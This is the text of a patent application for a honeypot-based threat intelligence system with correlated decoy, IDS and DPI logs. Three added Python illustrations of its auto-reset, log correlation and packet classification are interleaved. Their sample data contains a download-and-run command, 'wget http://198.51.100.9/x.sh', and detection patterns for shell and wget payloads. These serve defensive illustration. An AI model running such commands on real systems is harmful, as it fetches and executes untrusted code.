A Method And System For Implementing A Threat Intelligence Service For Preventing A Cyber Attack

Abstract: A method implementing a threat intelligence service using deception for preventing a cyber-attack on a network is disclosed. The method includes detecting, by a honeypot engine, at least one activity by an attacker, wherein the honeypot engine emulates a vulnerable service to lure the attacker. The method includes capturing, by the honeypot engine, data associated with the at least one activity and the attacker, wherein the data is logged by one or more decoy sensors in a network event log. The method includes detecting, by an intrusion detection engine, an attack on the network by processing the network event log and generating a network activity log upon detecting the attack. The method includes analyzing, by a Deep Packet Inspection (DPI) engine, network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis.

Patent Information

Filing Date: 22 February 2024
Publication Number: 09/2024
Publication Type: INA
Invention Field: COMPUTER SCIENCE

Applicants

WHIZHACK TECHNOLOGIES PVT. LTD.
PPJ121, DLF PARK PLACE DLF CITY PHASE-V GURUGRAM, HARYANA 122011 INDIA

Inventors

1. SANJAY SENGUPTA
K1/34, CR Park, New Delhi, Pin Code: 110019, India
2. MAHESH BANERJEE
H. No. 65B, Ward No. 10, Jawahar Nagar, U. S. Nagar, Uttarakhand, Pincode: 263145, India.

Specification

Description:
[0001] The present subject matter relates, in general, to the field of cyber security and, in particular, to a method and a system for implementing a threat intelligence service for preventing a cyber-attack on a network.
BACKGROUND

[0002] Cybersecurity teams across industries (enterprise, ICS and IoT) recognize that, despite the range of security tools and services in place, cyber criminals still manage to bypass them and gain entry to infrastructures. Clearly, a new approach is required. Deception strategies are a highly effective way to detect insider threats and provide actionable threat intelligence: a host accessing deceptive elements is an indication that it is roaming in parts of the network where it has no authority. However, the known threat intelligence systems have the shortcomings described below.
[0003] Most of the available solutions for generating threat intelligence either provide local intelligence via open source or proprietary threat feeds embedded in the monitoring services used for detecting the attacks on the decoy services, or provide global intelligence by collating information about threats reported at a global scale. These solutions fail to provide threat intelligence specific to the target environment, which would combine the local intelligence with the relevant information from specific global threat intelligence sources. The present framework addresses this problem by providing local as well as specific global intelligence using threat feeds, and it also provides integrations for third-party threat feeds.
[0004] Most deception-based solutions provide only event/alert logs, which only give information about the tactics, techniques and procedures used by the attacker to compromise the system. Other solutions provide activity logs of the decoy services, which highlight the actions taken by the attacker after gaining control over the service. Each of these log types provides only an isolated view of the attack, either from the network or from the host (the environment in which the decoy service is emulated) perspective. To completely analyse the impact of an attack, the event/alert logs need to be correlated with the activity logs extracted from the deception environment; such correlation can also detect previously unknown threats for which no signatures are available.
[0005] Furthermore, most deception solutions generate a large volume of data, much of which is irrelevant or consists of false positives, making it challenging to distinguish genuine threats from noise. Most solutions provide deception either with honeypots on virtual machines or with honeypots as Docker containers, but not both. No known solution uses dynamic intelligent shifting sensors to obtain indicators of compromise.
[0006] Thus, there is a need for a solution to overcome the above-mentioned drawbacks.
OBJECTS OF THE DISCLOSURE
[0007] Some of the objects of the present disclosure, which at least one embodiment herein satisfy, are listed below.
[0008] It is a general or primary object of the present subject matter to provide a method for implementing a threat intelligence service for preventing a cyber-attack on a network.
[0009] It is another object of the present subject matter to provide dynamic intelligent shifting sensors with hybrid virtualization technology, aimed at providing a hardware- and platform-agnostic framework that generates holistic, 360-degree threat intelligence covering each characteristic of the attacks that can potentially happen in an environment. The framework accomplishes this by generating analytics and intelligence from adaptable and dynamic decoy services that are aimed at engaging attackers so that they reveal their tactics, techniques and behavior.
[0010] It is another object of the present subject matter to provide a universal mechanism for deployment of the decoy services, along with the necessary monitoring and configuration services, on target environments such as on-premise, air-gapped on-premise and cloud IT infrastructure as well as OT and IoT infrastructure.
[0011] It is another object of the present subject matter to provide automated installation facilities that require minimum user configuration effort for deploying the decoy and monitoring services.
[0012] It is another object of the present subject matter to provide maximum isolation of the environment in which the decoy services run from the production environment, so that even if an attacker compromises a decoy service and tries to move laterally, there is no path to the production environment.
[0013] It is another object of the present subject matter to provide a logging mechanism that generates cumulative logs covering all the characteristics of the detected attacks by correlating the logs generated by different monitoring services, such as event monitoring services, fingerprinting of the target and attacker hosts, and the application logs created by the attackers on the target hosts.
[0014] It is another object of the present subject matter to provide a dedicated behavior analytics logging mechanism that correlates the logs produced by the network traffic monitoring service (the DPI engine) with the cumulative attack logs, to generate logs that contain the relevant network activity of the attack together with the other information that defines how the attack was carried out.
[0015] It is another object of the present subject matter to provide monitoring services for detecting attacks that support integration of external threat feeds, enabling the monitoring services to detect a wide variety of the latest attack tactics, techniques and procedures used by attackers.
[0016] It is another object of the present subject matter to provide a dedicated mechanism for automatically updating and reconfiguring the decoy services based on external inputs, enabling the decoy services to adapt to the specific threat landscape of the target environment.
[0017] It is another object of the present subject matter to provide a mechanism for periodic clean-up and rebuild of the deception environment together with the decoy services, making the system resilient against the attacks encountered and enabling it to recover in the event of compromise.
[0018] These and other objects and advantages will become more apparent when reference is made to the following description and accompanying drawings.
SUMMARY
[0019] This summary is provided to introduce concepts related to a system implementing a threat intelligence service using deception for preventing a cyber-attack on a network. The system includes one or more decoy sensors amongst a plurality of decoy sensors. The one or more decoy sensors include a honeypot engine configured to detect at least one activity by an attacker, wherein the honeypot engine emulates a vulnerable service to lure the attacker, and to capture data associated with the at least one activity and the attacker, wherein the data is logged by the one or more decoy sensors in a network event log. The one or more decoy sensors include an intrusion detection engine configured to detect an attack on the network by processing the network event log and to generate a network activity log upon detecting the attack. The one or more decoy sensors include a Deep Packet Inspection (DPI) engine configured to analyse network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis. The one or more decoy sensors include a log consolidation and correlation engine configured to process the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs, wherein a cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs is extracted from a plurality of deception services and the plurality of cumulative attack event and attack activity behavior logs comprises one or more characteristics of the at least one activity of the attacker. The system further includes a log aggregation engine configured to analyse the cumulative attack log and determine an action for preventing the detected cyber-attack on the network. The system is configured to update and reconfigure the deception service based on one or more external inputs, in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without the deception service being discovered as such.
[0020] Various objects, features, aspects, and advantages of the inventive subject matter will become more apparent from the following detailed description of preferred embodiments, along with the accompanying drawing figures in which like numerals represent like components.
BRIEF DESCRIPTION OF THE DRAWINGS
[0021] The illustrated embodiments of the subject matter will be best understood by reference to the drawings, wherein like parts are designated by like numerals throughout. The following description is intended only by way of example, and simply illustrates certain selected embodiments of devices, systems, and methods that are consistent with the subject matter as claimed herein, wherein:
[0022] Fig. 1 illustrates a block diagram depicting an environment including a system for implementing a threat intelligence service using deception for preventing a cyber-attack on a network, in accordance with an embodiment of the present subject matter;
[0023] Fig. 2 illustrates a block diagram of the system, in accordance with an embodiment of the present subject matter;
[0024] Fig. 3 illustrates an operational flow diagram depicting a process for implementing a threat intelligence service using deception for preventing a cyber-attack on a network, in accordance with an embodiment of the present subject matter;
[0025] Fig. 4 illustrates a schematic block diagram depicting a decoy sensor and a log collection engine with each of their components, in accordance with an embodiment of the present subject matter; and
[0026] Fig. 5 illustrates a schematic block diagram depicting a method for implementing a threat intelligence service using deception for preventing a cyber-attack on a network, in accordance with an embodiment of the present subject matter.
DETAILED DESCRIPTION
[0027] The following is a detailed description of embodiments of the disclosure depicted in the accompanying drawings. The embodiments are in such detail as to clearly communicate the disclosure. However, the amount of detail offered is not intended to limit the anticipated variations of embodiments; on the contrary, the intention is to cover all modifications, equivalents, and alternatives falling within the scope of the present disclosure as defined by the appended claims.
[0028] As used in the description herein and throughout the claims that follow, the meaning of “a,” “an,” and “the” includes plural reference unless the context clearly dictates otherwise. Also, as used in the description herein, the meaning of “in” includes “in” and “on” unless the context clearly dictates otherwise.
[0029] Fig. 1 illustrates a block diagram 100 depicting an environment including a system 102 for implementing a threat intelligence service using deception for preventing a cyber-attack on a network, in accordance with an embodiment of the present subject matter. The system may be a cyber-threat intelligence framework that generates intelligence using decoy technology. Threat data may be generated using multiple decoy sensors, and then aggregated and analysed at a centralized collector to provide actionable analytics and insights on the characteristics of the attacks detected. The system may be designed for security analysts and network administrators, assisting them in improving the security posture of the network by providing threat event logs.
[0030] Continuing with the above embodiment, the system may be configured to detect at least one activity by an attacker. Further, the system may be configured to emulate a vulnerable service to lure the attacker. The system may be configured to capture data associated with the at least one activity and the attacker. The data may be logged by the one or more decoy sensors in a network event log. Moving ahead, the system may be configured to detect an attack on the network. The attack may be detected by processing the network event log; further, the system may be configured to generate a network activity log upon detecting the attack.
[0031] Upon generating the network activity log, the system may be configured to analyse network traffic associated with the network. The network traffic may be analysed for generating detailed data associated with the network traffic based on the analysis. Upon generation of the detailed data, the system may be configured to process the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs. A cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs may be extracted from a plurality of deception services, and the plurality of cumulative attack event and attack activity behavior logs may include one or more characteristics of the at least one activity of the attacker.
[0032] Moving forward, the system may be configured to analyse the cumulative attack log and determine an action for preventing the detected cyber-attack on the network. The action may be determined by identifying the attributes of the malicious activity leading to the attack. The system is configured to update and reconfigure the deception service based on one or more external inputs, in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without the deception service being discovered as such.
[0033] Fig. 2 illustrates a block diagram 200 of the system 102, in accordance with an embodiment of the present subject matter. The system may be configured to implement a threat intelligence service using deception for preventing a cyber-attack on a network. The system may be a framework that provides a distributed architecture for the generation of threat intelligence, using a central log collection module that performs log correlation (since a decoy sensor generates multiple types of logs) and an aggregation system that can ingest log data from multiple decoy sensors. The system may be configured to act as an early warning system, provide deception-based detection, enable actionable deception, and enhance threat visibility.
[0034] In an example, the system 102 may include a processor 202, a memory 204, data 206, a number of decoy sensors 208, a data collector engine 210, a monitoring engine 222, a task scheduler engine 224, and a Dynamic Intelligent Shifting Sensor (DISS) engine 226. Each decoy sensor amongst the number of decoy sensors may include a honeypot engine 212, an intrusion detection engine 214, a Deep Packet Inspection (DPI) engine 216, and a log consolidation and correlation engine 218. The data collector engine 210 may include a log aggregation engine 220. In an example, the processor 202, the memory 204, data 206, the number of decoy sensors, and the data collector engine may be communicatively coupled to one another.
[0035] The system 102 may be understood as one or more of a hardware, a configurable hardware, and the like. In an example, the processor 202 may be a single processing unit or a number of units, all of which could include multiple computing units. Among other capabilities, the processor 202 may be configured to fetch and/or execute computer-readable instructions and/or data stored in the memory 204.
[0036] In an example, the memory 204 may include any non-transitory computer-readable medium known in the art including, for example, volatile memory, such as static random access memory (SRAM) and/or dynamic random access memory (DRAM), and/or non-volatile memory, such as read-only memory (ROM), erasable programmable ROM (EPROM), flash memory, hard disks, optical disks, and/or magnetic tapes. The memory 204 may further include the data 206.
[0037] The data 206 serves, amongst other things, as a repository for storing data processed, received, and generated by the system 102.
[0038] Continuing with the above embodiment, one or more decoy sensors amongst the number of decoy sensors may be deployed. A deployed decoy sensor is part of a honeynet that auto-resets after a specific period, and based on the processed data the decoy sensor to be used after the next reset is selected from the plurality of decoy sensors. The one or more decoy sensors may auto-heal themselves based on thresholds on operational parameters such as memory usage, disk usage, network usage and CPU utilization. The one or more decoy sensors clean, reconfigure and update themselves once these thresholds are crossed.
[0039] The honeypot engine 212 within the one or more decoy sensors may be configured to detect at least one activity by an attacker. The honeypot engine 212 may be configured to emulate a vulnerable service to lure the attacker. Upon detecting the at least one activity, the honeypot engine 212 may be configured to capture data associated with the at least one activity and the attacker, wherein the data is logged by the one or more decoy sensors in a network event log.
[0040] Moving forward, the intrusion detection engine 214 may also be configured to detect an attack on the network by processing the network event log and generating a network activity log upon detecting the attack.
[0041] The DPI engine 216 may be configured to analyse network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis. The DPI engine 216 may be configured to analyse the network traffic by extracting each attribute associated with each header component and each payload component of one or more network packets associated with the network traffic, comparing one or more characteristics of each attribute associated with the one or more network packets, and correlating the one or more characteristics with other logs generated by the monitoring services that provide specific threat intelligence information. The DPI engine 216 may further be configured to determine whether each attribute is a malicious attribute or a benign attribute based on the comparison.
[0042] Subsequently, the log consolidation and correlation engine 218 may be configured to process the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs. A cumulative attack log amongst the number of cumulative attack event and attack activity behavior logs may be extracted from a plurality of deception services and the plurality of cumulative attack events and attack activity behavior logs comprises one or more characteristics of the at least one activity of the attacker.
[0043] Continuing with the above embodiment, the log aggregation engine 220 within the data collector engine 210 may be configured to analyse the cumulative attack log and determine an action for preventing the detected cyber-attack on the network. The system may be configured to update and reconfigure the deception service based on one or more external inputs, in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without the deception service being discovered as such. The log aggregation engine 220 may be configured to analyse the cumulative attack log by aggregating the plurality of network event logs and the plurality of cumulative attack event and attack activity behavior logs to generate cumulative attack logs. The log aggregation engine 220 may be configured to extract a plurality of relevant features present in the logs that are required for analysis of the network events and the attacks, and to generate a plurality of augmented logs by generating behavior logs from the plurality of deception services. The log aggregation engine 220 may be configured to analyse the plurality of cumulative attack event and attack activity behavior logs using a statistical filter, a temporal filter, and a spatial data filter. The log aggregation engine 220 may be configured to perform a correlational and a statistical analysis of the attacks recorded on the plurality of decoy sensors and extract the network event and attack activity behavior logs.
[0044] The DISS engine 226 may be configured to process data associated with the plurality of decoy sensors and the network being monitored by the plurality of sensors. The DISS engine 226 prevents an attacker from determining whether a decoy sensor is a honeypot or a production server. The DISS engine 226 may be configured to update the decoy services based on a plurality of external inputs, comprising the frequency, tactics and techniques of the attacks on the deception services, to adapt to the specific threat landscape of the target environment. In a preferred embodiment, the deception services may be isolated by executing each deception service in one or more isolated containers deployed on a virtual machine. The one or more isolated containers run in isolated environments independent of one another, so that an attack cannot proliferate further to the virtual machine and so that a compromised container cannot affect the other containers; this provides layered protection by combining the isolation of containerization with that of virtualization. This ensures that no lateral movement can happen even if a sensor is compromised. The deception service deployed in an environment may be cleaned up and rebuilt after a predetermined period of time.
[0045] Continuing with the above embodiment, the monitoring engine 222, which suggests new deception services for enhanced security deployment, may be configured to monitor the deception service deployed in an environment and to generate statistical data associated with the deception service based on that monitoring. The monitoring engine 222 may further be configured to determine another deception service to be deployed in the environment in future, based on the statistical data, and to recommend the other deception service to a deploying engine as feedback, wherein the deploying engine is configured to deploy decoy services in the environment.
[0046] The system may include the task scheduler engine 224, which may be configured to perform a number of tasks such as cleaning container volumes and persistent memory, resetting the network interfaces, and resetting and randomizing the user credentials of the deception services; these tasks are needed to remove any persistence the attacker has established in the containers of the deception services.
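The threshold-based auto-heal of paragraph [0038] and the reset tasks performed by the task scheduler engine in paragraph [0046] can be illustrated as a small decision routine. The following Python is an added example written for this page, not code from the patent or from the applicant. The parameter names follow the description, but the numeric thresholds, the task names, the rebuild period and the 16-character credential floor are assumptions chosen for the illustration.

```python
import secrets
import string
from dataclasses import dataclass, field

# Operational thresholds for the auto-heal condition. The parameters are the
# ones named in the description; the numeric limits are assumptions.
THRESHOLDS = {"cpu_pct": 85.0, "memory_pct": 80.0, "disk_pct": 90.0, "network_mbps": 400.0}

# Tasks the task scheduler runs on a reset, in the order they are applied here
# (names are assumptions; the actions are the ones the description lists).
RESET_TASKS = (
    "clean_container_volumes",
    "clear_persistent_memory",
    "reset_network_interfaces",
    "rotate_decoy_credentials",
)


@dataclass
class ResetDecision:
    reset: bool
    reasons: list = field(default_factory=list)
    tasks: tuple = ()


def evaluate_sensor(metrics, seconds_since_rebuild, rebuild_period_s, thresholds=THRESHOLDS):
    """Decide whether a decoy sensor must clean, reconfigure and rebuild itself.

    A rebuild is due either because the periodic rebuild interval has elapsed or
    because any operational metric has crossed its threshold. Metrics that were
    not reported are skipped rather than treated as a breach.
    """
    reasons = []
    if seconds_since_rebuild >= rebuild_period_s:
        reasons.append("periodic_rebuild_due")
    for name, limit in thresholds.items():
        value = metrics.get(name)
        if value is not None and value > limit:
            reasons.append(f"{name}={value} exceeds {limit}")
    if not reasons:
        return ResetDecision(False)
    return ResetDecision(True, reasons, RESET_TASKS)


_ALPHABET = string.ascii_letters + string.digits


def rotate_credentials(services, length=20):
    """Return fresh random credentials for each deception service.

    Uses the secrets module (a CSPRNG) so that credentials an attacker captured
    before the reset give no information about the ones issued after it.
    """
    if length < 16:  # assumed floor for decoy credentials
        raise ValueError("decoy credentials should be at least 16 characters")
    return {svc: "".join(secrets.choice(_ALPHABET) for _ in range(length)) for svc in services}


if __name__ == "__main__":
    decision = evaluate_sensor({"cpu_pct": 97.5, "memory_pct": 61.0}, 3600, 86400)
    print(decision)
    if decision.reset and "rotate_decoy_credentials" in decision.tasks:
        print(rotate_credentials(["ssh", "telnet", "ftp"]))
```

Two points a practitioner would want from this step: the periodic rebuild runs even when every metric looks healthy, because a quiet compromised container is exactly the case the timer is for, and the credential rotation must draw from a cryptographic source, since an attacker who already logged into the decoy knows the previous credentials and would otherwise be able to predict the next ones.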
[0047] The system, consisting of the collector and the sensors, may be designed on a microservice platform, which makes it capable of scaling itself based on the input load, provided sufficient hardware is present. The limit of scalability is set by the hardware infrastructure provisioning (the hardware system configuration in the case of on-premise deployment, and the infrastructure capacity provided by the service provider in the case of cloud deployment).
[0048] Fig. 3 illustrates an operational flow diagram depicting a process 300 for implementing a threat intelligence service using deception for preventing a cyber-attack on a network, in accordance with an embodiment of the present subject matter. The process 300 may be performed by the system 102 as referred to in Fig. 2. The process 300 may be based on cyber deception and may employ one or more deception techniques. Employing the one or more deception techniques may be an effective way to detect insider threats and provide actionable threat intelligence on the network. A host accessing a deceptive element may be an indication that it is roaming in parts of the network where it has no authority.
[0049] At step 302, the process 300 may include detecting at least one activity by an attacker. The at least one activity may be detected by the honeypot engine 212 as referred to in Fig. 2. The honeypot engine 212 may be incorporated within the one or more decoy sensors as referred to in Fig. 2. The honeypot engine 212 may be configured to emulate a vulnerable service to lure the attacker. In a preferred embodiment, the vulnerable-service deception works when the attacker interacts with the vulnerable service. Further, the at least one activity may be recorded in the form of attack logs upon a successful intrusion into the vulnerable service emulated by the honeypot engine 212.
[0050] At step 304, the process 300 may include capturing data associated with the at least one activity and the attacker. The data may be captured by the honeypot engine 212 and logged by the one or more decoy sensors in a network event log.
[0051] At step 306, the process 300 may include detecting an attack on the network by processing the network event log and generating a network activity log upon detecting the attack. The attack may be detected by the intrusion detection engine 214. The intrusion detection engine 214 may be incorporated within the one or more decoy sensors.
[0052] At step 308, the process 300 may include extracting each attribute associated with each header component and each payload component of one or more network packets associated with the network traffic. Each attribute may be extracted by the DPI engine 216 to analyse the network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis.
[0053] At step 310, the process 300 may include comparing one or more characteristics of each attribute associated with the one or more network packets and correlating the one or more characteristics with other logs generated by the monitoring services that provide specific threat intelligence information. The process 300 may then include determining whether each attribute is a malicious attribute or a benign attribute based on the comparison. Steps 308 and 310 may be performed by the DPI engine 216 as referred to in Fig. 2.
[0054] At step 312, the process 300 may include processing the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs. A cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs may be extracted from a plurality of deception services. The plurality of cumulative attack event and attack activity behavior logs may include one or more characteristics of the at least one activity of the attacker. Step 312 may be performed by the log consolidation and correlation engine 218.
[0055] At step 314, the process 300 may include analysing the cumulative attack log and determining, by the data collector engine 210, an action for preventing the detected cyber-attack on the network. The system may be configured to update and reconfigure the deception service based on one or more external inputs, in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without the deception service being discovered as such. Analysing the cumulative attack log may include aggregating, by the log aggregation engine 220, the plurality of network event logs and the plurality of cumulative attack event and attack activity behavior logs to generate cumulative attack logs. Analysing may also include extracting, by the log aggregation engine 220, a plurality of relevant features present in the logs that are required for analysis of the network events and the attacks; generating, by the log aggregation engine 220, a plurality of augmented logs by generating behavior logs from the plurality of deception services; and analysing, by the log aggregation engine 220, the plurality of cumulative attack event and attack activity behavior logs using a statistical filter, a temporal filter, and a spatial data filter. Analysing may further include performing, by the log aggregation engine 220, a correlational and a statistical analysis of the attacks recorded on the plurality of decoy sensors and extracting the network event and attack activity behavior logs.
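Steps 312 and 314 above (and paragraphs [0042] and [0043]) describe two stages: on each decoy sensor, the honeypot event log, the IDS network activity log and the DPI detailed data are consolidated into cumulative attack logs; at the collector, those logs are aggregated across sensors and passed through statistical, temporal and spatial filters. The following Python is an added example written for this page, not code from the patent or the applicant. The log records, their field names, the per-sensor correlation window and the filter thresholds are all constructed assumptions for the illustration.

```python
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample logs from two decoy sensors (not captured data): per sensor,
# a honeypot event log, an IDS alert log and DPI records. Timestamps are epoch seconds.
SENSOR_LOGS = {
    "s1": (
        [{"ts": 1000, "src": "203.0.113.7", "service": "ssh", "action": "login_failed", "detail": "root/123456"},
         {"ts": 1005, "src": "203.0.113.7", "service": "ssh", "action": "login_ok", "detail": "root/toor"},
         {"ts": 1009, "src": "203.0.113.7", "service": "ssh", "action": "command", "detail": "wget http://198.51.100.9/x.sh"},
         {"ts": 1300, "src": "198.51.100.22", "service": "telnet", "action": "login_failed", "detail": "admin/admin"}],
        [{"ts": 1001, "src": "203.0.113.7", "signature": "SSH brute force"},
         {"ts": 1010, "src": "203.0.113.7", "signature": "Outbound fetch to suspicious host"}],
        [{"ts": 1009, "src": "203.0.113.7", "dport": 22, "tag": "ssh_session"},
         {"ts": 1010, "src": "203.0.113.7", "dport": 80, "tag": "http_get_script"}],
    ),
    "s2": (
        [{"ts": 1500, "src": "203.0.113.7", "service": "ssh", "action": "login_failed", "detail": "root/admin"}],
        [{"ts": 1501, "src": "203.0.113.7", "signature": "SSH brute force"}],
        [],
    ),
}


@dataclass
class CumulativeAttackLog:
    sensor: str
    attacker: str
    first_seen: int
    last_seen: int
    services: set = field(default_factory=set)
    actions: list = field(default_factory=list)      # (ts, action, detail) from the honeypot
    signatures: set = field(default_factory=set)     # IDS signatures that fired
    payload_tags: set = field(default_factory=set)   # DPI classification of the flows
    event_count: int = 0


def consolidate(sensor, honeypot_events, ids_alerts, dpi_records, window_s=600):
    """Log consolidation and correlation on one decoy sensor (step 312).

    The three log types are merged into one time-ordered stream keyed by attacker
    source address. Records are folded into the same cumulative log while they
    arrive within window_s of that attacker's previous record; a longer gap
    closes the log and starts a new one.
    """
    stream = [(e["ts"], e["src"], "hp", e) for e in honeypot_events]
    stream += [(a["ts"], a["src"], "ids", a) for a in ids_alerts]
    stream += [(d["ts"], d["src"], "dpi", d) for d in dpi_records]
    stream.sort(key=lambda r: r[0])  # stable sort keeps same-timestamp order

    open_logs, closed = {}, []
    for ts, src, kind, rec in stream:
        log = open_logs.get(src)
        if log is not None and ts - log.last_seen > window_s:
            closed.append(open_logs.pop(src))
            log = None
        if log is None:
            log = open_logs[src] = CumulativeAttackLog(sensor, src, ts, ts)
        log.last_seen = ts
        log.event_count += 1
        if kind == "hp":
            log.services.add(rec["service"])
            log.actions.append((ts, rec["action"], rec["detail"]))
        elif kind == "ids":
            log.signatures.add(rec["signature"])
        else:
            log.payload_tags.add(rec["tag"])
    return closed + list(open_logs.values())


def aggregate(cumulative_logs, min_sensors=2, min_events=3, campaign_window_s=3600):
    """Log aggregation across decoy sensors with the three filters of step 314.

    spatial: attacker seen on at least min_sensors distinct sensors;
    temporal: all of the attacker's activity falls inside campaign_window_s;
    statistical: at least min_events events in total.
    Also returns how many cumulative logs touched each decoy service, the kind of
    statistic the monitoring engine feeds back to the service deployer.
    """
    by_attacker, service_hits = defaultdict(list), defaultdict(int)
    for log in cumulative_logs:
        by_attacker[log.attacker].append(log)
        for svc in log.services:
            service_hits[svc] += 1
    campaigns = []
    for attacker, logs in by_attacker.items():
        sensors = {l.sensor for l in logs}
        events = sum(l.event_count for l in logs)
        span = max(l.last_seen for l in logs) - min(l.first_seen for l in logs)
        if len(sensors) >= min_sensors and events >= min_events and span <= campaign_window_s:
            campaigns.append({
                "attacker": attacker, "sensors": sorted(sensors), "events": events, "span_s": span,
                "services": sorted(set().union(*(l.services for l in logs))),
                "signatures": sorted(set().union(*(l.signatures for l in logs))),
            })
    return campaigns, dict(service_hits)


def run_example():
    """Consolidate per sensor, then aggregate at the collector."""
    logs = []
    for sensor, (hp, ids, dpi) in SENSOR_LOGS.items():
        logs.extend(consolidate(sensor, hp, ids, dpi))
    return aggregate(logs)
```

With the constructed input, the single telnet probe from 198.51.100.22 is dropped by the spatial filter (one sensor only), while 203.0.113.7 survives all three filters because it touched both sensors within the window and its honeypot commands, IDS signatures and DPI flow tags end up in one record. That combined record is what the description means by a cumulative view rather than isolated network or host logs: the outbound fetch seen by DPI on port 80 is explained by the `wget` command captured in the honeypot session seconds earlier.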
[0056] Fig. 4 illustrates a schematic block diagram 400 depicting a decoy sensor and a log collection engine with each of their components, in accordance with an embodiment of the present subject matter. The block diagram 400 discloses the components of the system 102. The system 102 may be configured to dynamically update the deception services based on external inputs. Deception services need to be adaptable to the target environment's threat landscape in order to extract better, more specific threat intelligence. That may be achieved by provisioning a feedback mechanism that recommends to the decoy service deployer which services to deploy, based on statistical data about the already deployed services, hence making the system adaptable to each target environment.
[0057] Continuing with the above embodiment, the system 102 may provide a mechanism for layered isolation of the deception services from the production environment. This may be achieved by providing both software and hardware isolation in layers: the software isolation is achieved by executing the deception services in containers, and those containers are deployed on a virtual machine, which provides the hardware isolation.
[0058] Further, the DPI engine may be configured to monitor and analyse the network traffic. The deep packet inspection engine processes the live network traffic, extracts all attributes of the header and payload components of the network packets, and provides detailed information about the network packets. This enables profiling of the network traffic on the basis of the characteristics of the attributes of the packets constituting the traffic, and categorizing the traffic as malicious or benign based on correlation with other threat feeds. The system 102 may further generate cumulative attack logs covering all the characteristics of the detected attacks by correlating the logs generated by different monitoring services, such as event monitoring services, fingerprinting of the target and attacker hosts, and the application logs created by the attackers on the target hosts. That provides a 360-degree view of the tactics, techniques and procedures, with reference to the activities of the attacker, within the context of a particular attack. The system 102 may also analyse the characteristics of the attacker's activity to extract specific patterns that may be used for attacker profiling, which helps in determining whether the attacker is carrying out generic attacks to explore the environment or is targeting a specific service.
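Paragraph [0058] (and steps 308 and 310 above) describe the DPI engine extracting header and payload attributes from live packets and categorizing traffic as malicious or benign by correlation with threat feeds. The following Python is an added example written for this page, not code from the patent or the applicant: it parses a raw IPv4/TCP packet with the standard library `struct` module, taking the header lengths from the IHL and data-offset fields rather than assuming them, and matches the extracted attributes against an indicator set. The indicator values, the field set and the packets themselves are constructed for the illustration; they are not real feed data or captured traffic.

```python
import struct
from dataclasses import dataclass

# Constructed threat-feed indicators for this example (not a real feed).
THREAT_FEED = {
    "ips": {"203.0.113.7"},
    "payload_patterns": [b"/bin/sh", b"wget http://"],
}


@dataclass
class PacketAttributes:
    src: str
    dst: str
    proto: int
    sport: int
    dport: int
    flags: int      # TCP flag bits (low 9 bits of the data-offset/flags word)
    payload: bytes


def parse_ipv4_tcp(frame: bytes) -> PacketAttributes:
    """Extract header and payload attributes from one raw IPv4/TCP packet.

    Every length used to slice the frame is validated against the bytes actually
    present, because on a decoy sensor the packet contents are attacker-controlled
    and a forged IHL, total length or data offset must not mis-slice the payload.
    Anything that is not well-formed IPv4 carrying TCP raises ValueError.
    """
    if len(frame) < 20:
        raise ValueError("short IPv4 header")
    ver_ihl, _tos, total_len, _id, _frag, _ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", frame[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or total_len < ihl or len(frame) < total_len:
        raise ValueError("inconsistent IPv4 lengths")
    if proto != 6:
        raise ValueError("not TCP")
    tcp = frame[ihl:total_len]
    if len(tcp) < 20:
        raise ValueError("short TCP header")
    sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4
    if data_off < 20 or len(tcp) < data_off:
        raise ValueError("bad TCP data offset")
    return PacketAttributes(
        src=".".join(map(str, src)), dst=".".join(map(str, dst)), proto=proto,
        sport=sport, dport=dport, flags=off_flags & 0x1FF, payload=tcp[data_off:])


def classify(attrs: PacketAttributes, feed=THREAT_FEED):
    """Compare the extracted attributes with the threat-feed indicators.

    Returns ("malicious", reasons) when the source address or a payload pattern
    is on the feed, otherwise ("benign", []).
    """
    reasons = []
    if attrs.src in feed["ips"]:
        reasons.append(f"source {attrs.src} on threat feed")
    for pattern in feed["payload_patterns"]:
        if pattern in attrs.payload:
            reasons.append(f"payload matches {pattern!r}")
    return ("malicious" if reasons else "benign"), reasons


def build_packet(src, dst, sport, dport, payload, flags=0x018):
    """Assemble a minimal IPv4/TCP packet as constructed test input (checksums left zero)."""
    tcp_hdr = struct.pack("!HHIIHHHH", sport, dport, 1, 1, (5 << 12) | flags, 65535, 0, 0)
    total = 20 + len(tcp_hdr) + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, 6, 0,
                         bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return ip_hdr + tcp_hdr + payload


if __name__ == "__main__":
    for pkt in (build_packet("203.0.113.7", "10.0.0.5", 40000, 22, b""),
                build_packet("192.0.2.10", "10.0.0.5", 40001, 80, b"GET / HTTP/1.1\r\n"),
                build_packet("192.0.2.10", "10.0.0.5", 40002, 23, b"wget http://198.51.100.9/x.sh")):
        attrs = parse_ipv4_tcp(pkt)
        print(attrs.src, attrs.dport, classify(attrs))
```

The length checks are the part worth copying: a DPI engine fed by honeypot traffic sees whatever bytes the attacker chooses to send, and a parser that trusts the IHL or the TCP data offset will happily slice past the end of the frame or attribute header bytes to the payload, which is exactly the condition under which signature matching silently misses. Real deployments would also need IP reassembly and TCP stream reassembly before payload matching, which this single-packet example does not attempt.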
